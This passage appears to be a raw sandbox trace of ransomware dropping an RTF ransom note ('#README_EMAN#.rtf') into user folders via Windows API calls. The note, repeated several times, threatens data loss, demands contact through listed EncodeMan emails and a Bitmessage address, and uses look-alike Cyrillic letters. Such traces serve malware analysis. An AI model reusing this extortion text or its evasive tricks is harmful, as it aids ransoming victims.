\r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.594] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0286.594] WriteFile (in: hFile=0x2f0, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.598] CloseHandle (hObject=0x2f0) returned 1 [0286.809] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\#readme_eman#.rtf")) returned 0xffffffff [0286.809] GetLastError () returned 0x2 [0286.809] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.810] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES 